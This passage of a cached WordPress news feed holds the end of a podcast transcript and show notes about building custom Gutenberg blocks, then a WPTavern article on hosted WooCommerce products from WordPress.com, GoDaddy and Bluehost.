tool plus your own knowledge of PHP, getting started that way is not too bad.</p>\n\n\n\n<p>[00:11:39] <strong>Nathan Wrigley:</strong> In terms of building these things, the scenario that I just gave you was an agency. We&#8217;re using our own employees to build the blocks to service our clients. Do you feel that in the future there&#8217;s going to be, in much the same way that there is for plugins at the moment. You can, you know, you can really make a decent living if you have a popular plugin. Do you feel like the same is possible for blocks? And I don&#8217;t mean like a suite of blocks, like, for example the real estate one. Could you potentially create a block and then have a marketplace to sell it, and make a decent living? Because I feel that&#8217;s where the next shift in revenue streams for WordPress might .Be</p>\n\n\n\n<p>[00:12:16] <strong>Nick Deigo:</strong> I hope so. I think that it kind of speaks to the broader question of the WordPress economy and ecosystem, and we&#8217;re starting to see a lot of consolidation and all that kind of stuff. But I do think that there&#8217;s a lot of opportunity around blocks.</p>\n\n\n\n<p>I know I have my own personal blocks. They&#8217;re all free, but they&#8217;re starting to get like a lot of usage, in the multiple thousands of active users. And it&#8217;s really only started in the last year where it&#8217;s like, okay, I guess blocks are a thing, we should adopt them. People are starting to use it more and I think that it&#8217;s an opportunity to stake out your niche and you know, if you&#8217;re really knowledgeable about real estate or whatever it might be. Yeah, build blocks and I&#8217;m sure people want to use them.</p>\n\n\n\n<p>[00:12:54] <strong>Nathan Wrigley:</strong> What are the blocks that you&#8217;ve built?</p>\n\n\n\n<p>[00:12:55] <strong>Nick Deigo:</strong> So I&#8217;ve built one that adds SVG icons to the editor and you can make them colorful and move them around. And then one&#8217;s a social sharing block. Really simple, just allows you to share the current page or post.</p>\n\n\n\n<p>[00:13:07] <strong>Nathan Wrigley:</strong> And they&#8217;re getting traction, yeah?</p>\n\n\n\n<p>[00:13:09] <strong>Nick Deigo:</strong> My SVG icon one, which is just. Also, one thing, if you&#8217;re building blocks, it&#8217;s very much like there&#8217;s not many people doing it. So you can really get great block names. So I have a block called The Icon Block, right. It wasn&#8217;t taken, so it&#8217;s the icon block, and it just allows you to edit SVG icons. And, I looked the other day and it&#8217;s got 4,000 people using it. And I&#8217;m like, how is this happening?</p>\n\n\n\n<p>[00:13:31] <strong>Nathan Wrigley:</strong> Yeah, I kind of feel that the tide has gone, if you like for getting notoriety in plug-ins. I mean, sure, there are some that come along and for reasons that I can&#8217;t quite explain, they rise to the top quickly. They get some notoriety. But it sounds from what you&#8217;re saying as if, we&#8217;re just sort of landing on the beach really, and the beach head is yet to be taken. And if you get in now and develop now, you could be in that next wave and be what popular plug-ins are now.</p>\n\n\n\n<p>[00:13:53] <strong>Nick Deigo:</strong> Yeah, it could be. We&#8217;ll see.</p>\n\n\n\n<p>[00:13:56] <strong>Nathan Wrigley:</strong> Yeah. You used the word accessible. Now forgive me because I&#8217;ve completely misquoted you. You used the word accessible in your introduction. You were just talking about accessible in the sense of easy to use. But I am curious because I was interviewing somebody yesterday all about accessibility in WordPress, and we got into the interface and blocks and all of that kind of thing. So just a quick aside, the accessibility piece in blocks. Have you got anything to add in there?</p>\n\n\n\n<p>[00:14:19] <strong>Nick Deigo:</strong> I think that accessibility in the block editor is something that continually needs improvement. And so one of the things, and I think we&#8217;ll talk about this in a second, is that when you&#8217;re building a custom block, the more that you can take advantage of the way that core does things. So core block supports, and we&#8217;ll talk about that, but the more you can take advantage of core components and things like that, the better off you are.</p>\n\n\n\n<p>Because there&#8217;s a big emphasis on WordPress to improve accessibility. So if your block is using components from core, and core improves accessibility, your block will therefore also be more accessible. So instead of trying to do your own thing and code everything yourself. One, that&#8217;s harder. And two, you&#8217;re able to keep up with accessibility and all these other improvements by really staying close to core.</p>\n\n\n\n<p>[00:15:08] <strong>Nathan Wrigley:</strong> You&#8217;re talking there about an evolution over time and I really haven&#8217;t followed the trajectory of what blocks could do in the beginning and what they can do now. Is there a lot of change that&#8217;s happened over the last couple of years? The capabilities of a block, am I able to do much more now? Obviously we&#8217;re talking about how easy it is, but am I able to do more with blocks than I was, let&#8217;s say two years?</p>\n\n\n\n<p>[00:15:31] <strong>Nick Deigo:</strong> I don&#8217;t think necessarily that you could do more now, because you could always, if you were really skilled, you could always just write whatever you wanted. But a great example is block support. So block supports are when you create your block, you can define, I want my block to have typography support, or I want my block to have color support. It&#8217;s one line. Instead of having to write all the controls in a color palette and all the functionality, you just tell WordPress that this block has typography.</p>\n\n\n\n<p>Your block loads in the editor and it has all the typography controls already. And those are coming from core. You&#8217;re not having to code any of that. You just tell, my block has typography, and it gives it to you. And so if WordPress ever improves their typography controls, your block already gets those improved controls.</p>\n\n\n\n<p>So is it easier now? Can blocks do more? You can do more in blocks without having to code it yourself. You can do color, alignment, border, background colors, typography. All this stuff, you don&#8217;t have to code it all. You just tell WordPress that my block has this functionality and you&#8217;re good to go.</p>\n\n\n\n<p>[00:16:31] <strong>Nathan Wrigley:</strong> Are there any sort of gaping holes in all of this? In other words, if you Nick were in charge of the roadmap for what blocks would do, is there anything that you feel, do you know what It would be nice to have this.</p>\n\n\n\n<p>[00:16:41] <strong>Nick Deigo:</strong> I think that, I&#8217;m actually quite happy where things are, but I do think that we continually need better examples, more resources, because it&#8217;s still brand new. And one of the things I was actually talking to folks at the conference today, You may have been working in WordPress for 10 years and you have all this knowledge about how to build with WordPress. Unfortunately, that does not translate to building with blocks. Blocks is brand new. It&#8217;s completely different. It&#8217;s hard when you&#8217;re running a business to dedicate time to learn something new and it&#8217;s, that costs money. Time is money. And so the more that we can do to create examples, build tools that help people get quicker, the more adoption that we&#8217;ll have and, we&#8217;ll be better in the long run.</p>\n\n\n\n<p>[00:17:20] <strong>Nathan Wrigley:</strong> You come to these events and obviously you&#8217;ve got your block hat on. You have had for several years or certainly as long as I&#8217;ve been acquainted with you Do you find the conversation is more and more turning to blocks? In other words, there&#8217;s 600 people here. I don&#8217;t know how many of them would class themselves as developers, or capable or wishing to build blocks. But three or four years ago, I&#8217;m imagining that the conversation around blocks was basically Nick talking to himself. Is that changing? Are people more and more beginning to use this as the mode to create in WordPress</p>\n\n\n\n<p>[00:17:48] <strong>Nick Deigo:</strong> I fundamentally believe that we&#8217;ll get to a point where people either use a page builder like Elementor or whatever, that they&#8217;re really comfortable with, or they&#8217;ll use blocks. Core blocks or you build with a page builder. I think we&#8217;re going to get to that point.</p>\n\n\n\n<p>[00:18:01] <strong>Nathan Wrigley:</strong> And do you see that there&#8217;s a sort of conflict there? Do you do you see that there would be a point where. So we&#8217;ve got two paths in that scenario. You&#8217;ve got like a proprietary page builder. You mentioned Elementor, there&#8217;s lots of others. And then you&#8217;ve got blocks and obviously they go in completely different directions. Do you think that&#8217;s healthy? Is that a good thing? Or would it be, would it be better to sort of try to get them to coalesce in some way?</p>\n\n\n\n<p>I have no idea what that would even look like, because they are very different animals. But I don&#8217;t know, I don&#8217;t know if that&#8217;s a good thing to have almost like two, two variants of WordPress, and in 10 years time, you can imagine a crowd over there who are barely able to speak to the crowd over here. I don&#8217;t mean an impolite, but you know, they&#8217;re just talking complete cross purposes. The block chatter over here is incompatible with the page builder chatter over there. And that feels, in a way, like that would be a shame.</p>\n\n\n\n<p>[00:18:45] <strong>Nick Deigo:</strong> It definitely would be, but I do think that page builders, this is my own interpretation, but page builders were a response to the fact that it was fairly hard to build in the classic editor. So they were going to build a page builder experience that helped people build easier, and it&#8217;s multimillion dollar companies now running these page builders. I know people who are Elementor builders and that&#8217;s great. I mean, they found their niche and they build everything with Elementor, and it looks very different from core WordPress.</p>\n\n\n\n<p>Like that build process is completely different. I think we are going to end up with different camps. But as long as both communities are thriving and like, you know, everything is still compatible. We&#8217;re a big community and I think it can support different areas.</p>\n\n\n\n<p>[00:19:24] <strong>Nathan Wrigley:</strong> Yeah, we can definitely have both. Okay, give us some examples, some concrete examples, of things that you&#8217;ve seen out in the wild of blocks where you&#8217;ve thought that&#8217;s ingenious, that&#8217;s a really impressive use of it. There may be one, there may be a couple. You can name names and I&#8217;ll try to dig out the URL if I can find them.</p>\n\n\n\n<p>[00:19:40] <strong>Nick Deigo:</strong> So one of the things that I saw recently, which I don&#8217;t think this is released yet, but I&#8217;m forgetting the name of the technology where you can type in a prompt, and AI will generate an image for you.</p>\n\n\n\n<p>[00:19:51] <strong>Nathan Wrigley:</strong> Things like DALL-E.</p>\n\n\n\n<p>[00:19:52] <strong>Nick Deigo:</strong> Exactly. So there&#8217;s a gentleman, I&#8217;m forgetting his name. He&#8217;s working on a block that can do that all within the WordPress editor. So you can just type in whatever and it generates your four images and you pick the one you want. Automatically inserts it into the page. It&#8217;s all like super seamless, and that&#8217;s just amazing. We&#8217;ll save it to your media library. You can insert it, set it as your featured image. So all within the editor as a block.</p>\n\n\n\n<p>[00:20:16] <strong>Nathan Wrigley:</strong> I think that&#8217;s the piece which I find most exciting about blocks, is that if you&#8217;re just using core WordPress and the small collection of blocks that comes with it, you just sort of see them as an interface to add images, add text, maybe, you know, add some background color or what have you. But I kind of see this future where the block becomes like an application. It can do a whole ton of heavy lifting, but all you need to do on the back end as a user of that block is basically to click it, and then it comes and you can move it around on the page.</p>\n\n\n\n<p>The complexity that could drop into there, just in that one tiny little block which you just click, is almost infinite in scale. And so that&#8217;s a really great implementation of that. You click a button and suddenly that whole DALL-E thing is dropped into your, your website. Yeah That&#8217;s amazing. Any other examples?</p>\n\n\n\n<p>[00:21:05] <strong>Nick Deigo:</strong> Well, I think that there&#8217;s another one about like Anthony Burchell, he works at WP Engine as well. He&#8217;s building one that does virtual reality and metaverse stuff, really complicated. I build blocks that are super simple. Add icons, social sharing links or whatever. So you can build something really simple, but it&#8217;s all JavaScript. So you could also build something really complicated. And I think that that&#8217;s the beauty of the block interface.</p>\n\n\n\n<p>[00:21:27] <strong>Nathan Wrigley:</strong> You mentioned in your introduction, this is something I think we&#8217;ll explore a little bit more. You use the words, core components, native block support, and honestly at that point I was, I don&#8217;t even know what Nick is talking about. Explain all of that.</p>\n\n\n\n<p>[00:21:39] <strong>Nick Deigo:</strong> Block support is a little bit what I was talking about before with defining that your block, I want my block to have typography controls. I want my block to have color controls. There&#8217;s a set of defined supports within WordPress. I&#8217;m going to not get them all, but it&#8217;s like alignment, color, typography, border. There&#8217;s probably a few more. And all of those you can just define and WordPress will add all the controls for you all within the interface. So you don&#8217;t have to do anything other than say that my block has these supports. It really speeds up development time. You don&#8217;t have to build a color picker, build typography, selectors, anything. It&#8217;s all in WordPress.</p>\n\n\n\n<p>Core components are similar, where if you had a block and it had, you clicked on it, so it had like a toolbar that people could select items from, maybe change italicized font or whatever. There&#8217;s a toolbar component within WordPress, so rather than creating your own toolbar architecture, you just say use the toolbar component from WordPress, and then define the tools that you want in the toolbar.</p>\n\n\n\n<p>So using core supports really will speed up development, but on top of that, you&#8217;re using the same interface that WordPress is using. So from a user, it all feels very native. It&#8217;s the same looking toolbar that you get on your standard paragraph block or whatever it might be. And the beauty is, whenever WordPress updates or improves their toolbar control or their block, supports, your block will already get that improvement. You don&#8217;t have to worry about updating things yourself. It&#8217;s already, because you&#8217;re using WordPress core components and supports, when WordPress gets better, your block will automatically get better.</p>\n\n\n\n<p>[00:23:12] <strong>Nathan Wrigley:</strong> You mentioned Hello Dolly earlier, you know, one of the, if not the first plugin and it heralded an era of enormous change in WordPress, and all of a sudden you go 10 years later on and there&#8217;s loads of different plugins available. And you get this notion that, okay, enough now. You&#8217;ve got 50 plugins on your website, it&#8217;s probably time to think about the resources that you&#8217;re using and trimming that down a little bit. Do you fear the same may happen with WordPress websites, where we just click happy and install like a million blocks, because we want everything possible in the website. Is there a danger of bloat, just overdoing it with blocks?</p>\n\n\n\n<p>[00:23:49] <strong>Nick Deigo:</strong> A hundred percent. I think that you can have a block for everything and end up with a hundred blocks on your website. A hundred third party blocks in your website. It&#8217;s like, wow, there&#8217;s a lot of blocks. But at the same time, I think that, I was looking at a website of a user who needed some help and I opened it up and there&#8217;s a hundred plugins and notifications all over the place. You know, it&#8217;s just an absolute mess.</p>\n\n\n\n<p>And so I think with WordPress, you always can kind of mess, not mess it up, but you always can like over install. But I think that with blocks you can run into the same problem, but if you can stick to core as closely as possible. And hopefully core will get better and better, and so that you don&#8217;t need third party blocks to do simple things like buttons, let core take care of the simple stuff.</p>\n\n\n\n<p>And then you focus on third party blocks that do very niche things, things that core will never do. You&#8217;re thoughtful about it. You can probably pare it down to, you know, a handful of third party blocks that you actually need on your site. But yeah, there&#8217;s a good chance that we&#8217;re going to have sites with hundreds of blocks that maybe people never use.</p>\n\n\n\n<p>That&#8217;s why like I never wanted to disparage a block library plugin. Cause I think they&#8217;re really useful and help people get started. But most of the time you don&#8217;t need &#8217;em all. You only need a couple, but you install the block library that has 25, 30. So I like the idea of single block plugins where you can, I actually need this and I&#8217;m going to install it. I&#8217;m not going to install a hundred.</p>\n\n\n\n<p>[00:25:10] <strong>Nathan Wrigley:</strong> That&#8217;s going to be a really interesting thing for agencies because they&#8217;re going to be the people working out, which are the, the necessary blocks that they want their agency to use. So you&#8217;ve just described block suites, where 50 or a hundred come along for the ride and 99% of them you&#8217;re never going to use.</p>\n\n\n\n<p>That will become a core skill, is knowing, in the same way that you&#8217;ve got your favorite contact form plug in now and you&#8217;ve got your favorite whatever. I&#8217;m imagining that there&#8217;ll be a day where, we&#8217;ve all got our little list of, these are the suite of blocks that I&#8217;m using and I don&#8217;t stray outside of those. And that feels like an area of expertise that we can bring to clients just to make their lives a little bit easier. We know what to install for them because we&#8217;ve done it a thousand times before.</p>\n\n\n\n<p>[00:25:48] <strong>Nick Deigo:</strong> And I also think it&#8217;s going to be very important for agencies to remove blocks. Core has a ton of blocks, all the embed blocks. You could just have a default little script that strips &#8217;em all out and just has the very basics that people actually need. So we want to be adding blocks, but in many cases you also want to be removing them. The ones that you don&#8217;t need.</p>\n\n\n\n<p>[00:26:06] <strong>Nathan Wrigley:</strong> Did you ever come across a proposal by a chap called Joel Spolsky? I believe he was behind Trello possibly. I could be wrong, but anyway, he&#8217;s a, he&#8217;s got a heritage of doing things well in tech and implementing great applications. You came up with this notion of the block protocol and the idea behind the block protocol was that a block here in Trello would be able to be interoperable with a block over here, WordPress. Equally, you know, if you&#8217;ve got gmail working, the blocks in Gmail.</p>\n\n\n\n<p>So it&#8217;s pie in the sky stuff at the moment. It&#8217;s just an idea. But I read the proposal, I just thought it was really compelling. I love, I mean, especially in open source. I can imagine companies, proprietary software companies, they might be a little reluctant to do this because their secret source is the fact that their code is, you know, is obfuscated and we don&#8217;t know what they&#8217;re doing. But I do love the idea of that, and I was curious what your thoughts were.</p>\n\n\n\n<p>[00:27:00] <strong>Nick Deigo:</strong> I think it&#8217;s fascinating and I also think, we talked a little bit about block supports, where instead of every plugin registering a different way to do typography or a different way to do color, by standardizing the way different common controls are used in blocks. You can get towards something like this, where you standardize this. Also, you can take one block from WordPress and drop it in another application and take that one from the other application, drop it into WordPress. That interoperability between applications I think is quite fascinating. We&#8217;ll see where it goes. You know, we&#8217;ve heard about Tumblr possibly integrating the Gutenberg and it&#8217;s like, oh, that&#8217;s interesting.</p>\n\n\n\n<p>[00:27:36] <strong>Nathan Wrigley:</strong> So there&#8217;s services like Zapier. It&#8217;s enormously popular because it enables interoperability. That&#8217;s basically all it does. And people use it all the time to just connect the dots with all the disparate services they&#8217;ve got, and if we could have that in the future and it was block based, that would be really great. I wouldn&#8217;t have to have a giant bill for Zapier every month.</p>\n\n\n\n<p>[00:27:56] <strong>Nick Deigo:</strong> Exactly. Well, one of the things I think, even in a block architecture, I know full site editing is brand new, and we won&#8217;t get into that discussion, but the idea behind full site editing is everything is a block. And when you standardize every piece of content on your website as a block, then you can start just doing interesting things with blocks because everything&#8217;s a block.</p>\n\n\n\n<p>So you can create plugins that target blocks, and all of a sudden you can target the entire website. And so, by already moving to a block based architecture, we&#8217;re starting to move in the direction where you can start moving blocks around much simpler because it&#8217;s a standardized unit of content. As opposed to random things.</p>\n\n\n\n<p>[00:28:31] <strong>Nathan Wrigley:</strong> I know that the idea of everything is a block is beguiling and it sounds great. Do you think some things shouldn&#8217;t be in the domain of blocks? So, sorry to drag you into full site editing, but you know, it&#8217;s the best example I can conjure up at this moment. Things like navigation as a block. It&#8217;s tricky. It&#8217;s difficult to use and it feels almost like it&#8217;s throwing the baby out with the bath water a bit, because I know the current interface is a bit old and maybe people don&#8217;t like that and they would love it to be in a block, but it kind of feels, don&#8217;t break. What&#8217;s the phrase? If it isn&#8217;t broken, don&#8217;t. Yeah. Yeah, that, that phrase.</p>\n\n\n\n<p>[00:29:02] <strong>Nick Deigo:</strong> No, I agree. I think that there are certain components that are really hard to build in block form. And taking the navigation, for example. It&#8217;s really tiny. It&#8217;s at the top of the screen and manipulating all your links and sub navigation, it&#8217;s very challenging. I think that having that be a block under the hood is fine, but the way that users interact with it needs to be greatly improved.</p>\n\n\n\n<p>[00:29:23] <strong>Nathan Wrigley:</strong> So it&#8217;s the UI? The principle of it being a block is fine, it&#8217;s just the UI that needs potentially addressing?</p>\n\n\n\n<p>[00:29:28] <strong>Nick Deigo:</strong> In many ways you could have taken the old UI, and under the hood made it all blocks, but keep the same UI, and that would be fine. It&#8217;s the moving things around and trying to manipulate it. It&#8217;s very hard.</p>\n\n\n\n<p>[00:29:38] <strong>Nathan Wrigley:</strong> And because it&#8217;s hard, and because these things pop up in our WordPress, we get version 6.1 and we&#8217;ve got all these new things, and we&#8217;ve gotta figure out what&#8217;s going on. Do you find that you are having to fight this fight often? Every time a new version of WordPress comes out, do you need a new line of defense? Okay don&#8217;t worry it&#8217;s going to be alright?</p>\n\n\n\n<p>[00:29:57] <strong>Nick Deigo:</strong> Yes, and I think that it&#8217;s one of those, so we&#8217;re doing the walkthrough next week for 6.1, where we&#8217;re going to try to show everybody all the cool stuff that&#8217;s coming out. You do a disservice to WordPress by not pointing out things that need improving. Navigation block is one of them.</p>\n\n\n\n<p>We need to be honest about the fact that it&#8217;s not the best it can be. Because new users are going to get in there and they&#8217;re going to get frustrated. And one of the biggest, not, again, not to get, toot my own horn here, but the biggest thing for me is consistency. So one of the things that we haven&#8217;t had in WordPress is the same typography controls on every block.</p>\n\n\n\n<p>You know, I could change font family on my headings, but not my paragraphs. You know, that kind of stuff really starts to confuse people, especially new users. And with 6.1 we&#8217;re starting to get some of that consistency. Big, big effort now to improve consistency across blocks. And we won&#8217;t get people to get excited about things and use this new stuff, but we need to be, we need to recognize when things aren&#8217;t perfect, and what can we do to improve them.</p>\n\n\n\n<p>[00:30:52] <strong>Nathan Wrigley:</strong> Thanks Nick for joining us today. I really appreciate it.</p>\n\n\n\n<p>[00:30:54] <strong>Nick Deigo:</strong> Thanks so much.</p>\n</div>\n\n\n\n<p>On the podcast today we have <a href=\"https://nickdiego.com/\">Nick Diego</a>.</p>\n\n\n\n<p>Nick is a Developer Advocate at WP Engine. He can be found creating educational content, building plugins and themes, and contributing to WordPress Core.</p>\n\n\n\n<p>He’s on the podcast to talk about his passion and optimism for the future of WordPress using blocks.</p>\n\n\n\n<p>At the recent WordCamp US, Nick gave a presentation entitled, ‘Let’s Build a Custom Block in 15 Minutes’. It was his attempt to show a group of WordPress enthusiasts that the barrier to creating blocks is slowly being eroded, due to the creation of new tools. These tools are creating opportunities for people who might otherwise have stayed away from block development.</p>\n\n\n\n<p>It’s becoming easier to create the blocks, as the tools take away much of the technical burden of getting you up and running without advanced knowledge of JavaScript and React. Coupled with core components, native block supports, and a bit of guidance, Nick thinks that every WordPress developer can add custom blocks to their repertoire.</p>\n\n\n\n<p>It’s clear that Nick is all in on blocks, and during the podcast he makes the case for why you should be too. They offer so many opportunities for what can be displayed on a page, and their capabilities are only getting better.</p>\n\n\n\n<p>We talk about how WordPress core blocks are trying to support developers by adding components and block supports so you don’t have to repeat the development work already done by others; you can build on top of previous work and save yourself valuable time.</p>\n\n\n\n<p>It’s a fascinating chat, especially for those who are, as yet, undecided about whether they want to embrace WordPress blocks.</p>\n\n\n\n<p>Typically, when we record the podcast, there’s not a lot of background noise, but that’s not always the case. Over the coming weeks, I’ll be bringing you recordings from a recent trip to WordCamp US 2022, and you might notice that the recordings have a little echo or other strange audio artefacts. Whilst the podcasts are more than listenable, I hope you understand that the vagaries of the real world were at play.</p>\n\n\n\n<h2>Useful links.</h2>\n\n\n\n<p><a href=\"https://learn.wordpress.org/tutorial/using-the-create-block-tool/\">Using the create-block Tool tutorial</a></p>\n\n\n\n<p><a href=\"https://wordpress.org/plugins/stable-diffusion/\">Block Diffusion – Generate images from text prompts</a></p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 12 Oct 2022 14:00:00 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"Nathan Wrigley\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:34;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:77:\"Do The Woo Community: An Easy Accessibility Tip for WooCommerce Site Builders\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"https://dothewoo.io/?p=73090\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:73:\"https://dothewoo.io/easy-accessibility-tip-for-woocommerce-site-builders/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:429:\"<p>How can you know if your WooCommerce website your building works for disabilities? Here\'s a quick and easy way to find out. </p>\n<p>&gt;&gt; The post <a rel=\"nofollow\" href=\"https://dothewoo.io/easy-accessibility-tip-for-woocommerce-site-builders/\">An Easy Accessibility Tip for WooCommerce Site Builders</a> appeared first on <a rel=\"nofollow\" href=\"https://dothewoo.io\">Do the Woo - a WooCommerce Builder Community</a>	.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 12 Oct 2022 09:29:00 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:5:\"BobWP\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:35;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:122:\"WPTavern: Hosted WooCommerce Solution Coming to WordPress.com in 2023, Following Recent Launches from GoDaddy and Bluehost\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:30:\"https://wptavern.com/?p=138508\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:132:\"https://wptavern.com/hosted-woocommerce-solution-coming-to-wordpress-com-in-2023-following-recent-launches-from-godaddy-and-bluehost\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:9205:\"<p>WooSesh kicked off this week with a keynote session from WooCommerce CEO Paul Maiorana, who gave an overview of the current state of the ecosystem. More than 3.4 million websites use WooCommerce, according to Builtwith, including 25% of the top million online stores. It is by far the most popular solution among WordPress sites with e-commerce, capturing 93% of the market share.</p>\n\n\n\n<p>Maiorana covered some industry-wide trends taking shape in 2023. WooCommerce merchants are uncertain about the economy and while some are optimistic, others do not see it improving soon. Although growth has slowed since the pandemic-fueled rapid acceleration towards e-commerce in 2021, Maiorana said revenues are projected to gain steadily through 2025.</p>\n\n\n\n<p>WooCommerce core is entering a transformative time, as the new admin has been fully merged and Cart and Checkout blocks are now part of core (in beta). The plugin is becoming more block friendly with more than 40 blocks available now. WooCommerce has seen a 319% increase in the usage of block themes and is aiming to have full out-of-the-box compatibility with any block-based theme.</p>\n\n\n\n<h2>The Market for Hosted WooCommerce Products Is Heating Up</h2>\n\n\n\n<p>One of the biggest announcements from the event was that WooCommerce is developing its own hosted, turnkey solution in collaboration with hosting partners. WordPress.com will be the first to pilot the product in February 2023. Maiorana said the goal of the solution is to improve onboarding and retention with the following :</p>\n\n\n\n<ul>\n<li>WooCommerce pre-installed, activated, and hosted</li>\n\n\n\n<li>A pre-packaged set of essential plugins</li>\n\n\n\n<li>Simplified onboarding that works with partners&#8217; systems to improve conversion</li>\n\n\n\n<li>Competitive monthly price to reduce churn</li>\n\n\n\n<li>Co-marketing and revenue share with hosts</li>\n</ul>\n\n\n\n<p>WooCommerce&#8217;s hosted solution will be in direct competition with other hosts that have recently launched their own products.</p>\n\n\n\n<p>In November 2021, <a href=\"https://wptavern.com/godaddy-acquires-pagely-to-deploy-new-woocommerce-saas-product\">GoDaddy acquired Pagely</a> with the intent to deploy a new SaaS WooCommerce product. Pagely was paired with previous 2020 acquisitions of Poynt, a payment processor, and SkyVerge, a popular WooCommerce plugin development company, to create an integrated solution. Last month, GoDaddy <a href=\"https://www.godaddy.com/garage/managed-woocommerce-stores-coming-soon/\">launched</a> an open access preview of <a href=\"https://www.godaddy.com/offers/mwcs-mlp\">Managed WooCommerce Stores</a> to US-based customers. </p>\n\n\n\n<p>GoDaddy&#8217;s solution boasts the ability to sync across marketplaces, including Amazon, eBay, Google, Walmart, Etsy, and YouTube, with a single dashboard managing payment processing, marketing, shipping, and inventory. It is integrated with GoDaddy Payments for both online and in-person transactions, which incur a transaction fee of 2.3% + 30¢. The hosted WooCommerce preview plans range from $99.99/month &#8211; $249.99/month.</p>\n\n\n\n<img />\n\n\n\n<p>At WooSesh today, Beka Rice, Senior Director of Product Management at GoDaddy, gave <a href=\"https://www.slideshare.net/BekaRice/woosesh-2022-connected-commerce\">an overview of multichannel and omnichannel sales for e-commerce merchants</a> during her presentation. Enabling multichannel store management seems to be one of the main selling points of GoDaddy&#8217;s offering.</p>\n\n\n\n<img />\n\n\n\n<p>Bluehost is another recent contender in the managed WooCommerce hosting space, having launched its product last month. In March, Newfold Digital, Bluehost&#8217;s parent company, <a href=\"https://wptavern.com/newfold-digital-acquires-yith-to-expand-woocommerce-expertise\">acquired YITH</a>,  a WordPress plugin company with more than 100 WooCommerce extensions. Bluehost&#8217;s managed WooCommerce packages include a curated set of YITH plugins to help merchants extend their stores to offer gift cards, bookings and appointments, wishlists, product filtering, and more.</p>\n\n\n\n<p>Bluehost offers two plans. For the first year, when billed yearly, customers pay $9.95/month for a simple store or $12.95/month for selling across various marketplaces. Customers on the more expensive plan have the option to manage product inventory across Etsy, Amazon and eBay from a consolidated dashboard via Ecomdash. At the budget end of the WooCommerce hosting spectrum, Bluehost&#8217;s offering has an emphasis on creating a user-friendly, guided onboarding experience.</p>\n\n\n\n<img />\n\n\n\n<p>Bluehost conducted an internal research study last year and found that its small business customers were looking for solutions that would allow them to sell online, but many  of them are first-time website creators. The company created this new WooCommerce offering to eliminate the hassle of navigating themes and the many plugins required to launch a store.</p>\n\n\n\n<p>Bluehost uses YITH&#8217;s <a href=\"https://wonder.yithemes.com/.\">Wonder theme</a> as the stores starting theme, which we <a href=\"https://wptavern.com/yith-wonder-a-new-free-wordpress-theme-with-support-for-woocommerce-and-full-site-editing\">reviewed</a> in August.</p>\n\n\n\n<p>&#8220;Our theme is built for WordPress, utilizes the block structure that modern WordPress websites are beginning to adopt (one of the early block-based<br />WooCommerce block themes) and also includes three full-page patterns for different homepage layouts and designs,&#8221; Newfold Digital SVP of Digital Presence and Commerce Jason Cross said.</p>\n\n\n\n<p>&#8220;This not only provides users with a modern looking store, but also allows them to continue to customize it with ease in the future. YITH Wonder comes with six different style variations that make it easy to customize the accent color combinations and typography for the site.&#8221;</p>\n\n\n\n<p>Bluehost&#8217;s offering is aimed at catering to the merchants who will be building the stores themselves. The company has not created its own payments solution but connects to popular payment providers such as PayPal and Stripe and offers cash on delivery and in-store pickup options.</p>\n\n\n\n<p>WooCommerce is at the start of its journey towards launching a hosted solution but the company also 